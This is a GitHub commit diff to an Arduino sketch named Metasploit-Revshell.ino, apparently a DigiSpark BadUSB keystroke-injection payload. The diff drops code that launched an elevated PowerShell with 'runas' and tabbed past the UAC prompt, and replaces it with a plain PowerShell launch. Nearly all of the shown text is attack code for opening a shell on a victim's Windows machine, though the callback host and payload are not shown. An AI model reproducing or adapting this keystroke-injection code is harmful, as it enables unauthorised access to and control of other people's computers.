Skip to content

Commit 23ea003

Browse files
Update Metasploit-Revshell.ino
1 parent 028ba16 commit 23ea003

File tree

1 file changed

+1
-5
lines changed

1 file changed

+1
-5
lines changed

Metasploit-Revshell/FastMRShell/Metasploit-Revshell.ino

Lines changed: 1 addition & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -47,11 +47,7 @@ pisca_led(100);
4747
DigiKeyboard.delay(500);
4848
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
4949
DigiKeyboard.delay(500);
50-
DigiKeyboard.print("powershell start-process powershell -verb runas");
51-
DigiKeyboard.delay(500);
52-
DigiKeyboard.sendKeyStroke(KEY_ENTER);
53-
DigiKeyboard.delay(3000);
54-
DigiKeyboard.print("\t\t");
50+
DigiKeyboard.print("powershell");
5551
DigiKeyboard.delay(500);
5652
DigiKeyboard.sendKeyStroke(KEY_ENTER);
5753
DigiKeyboard.delay(1000);

0 commit comments

Comments
 (0)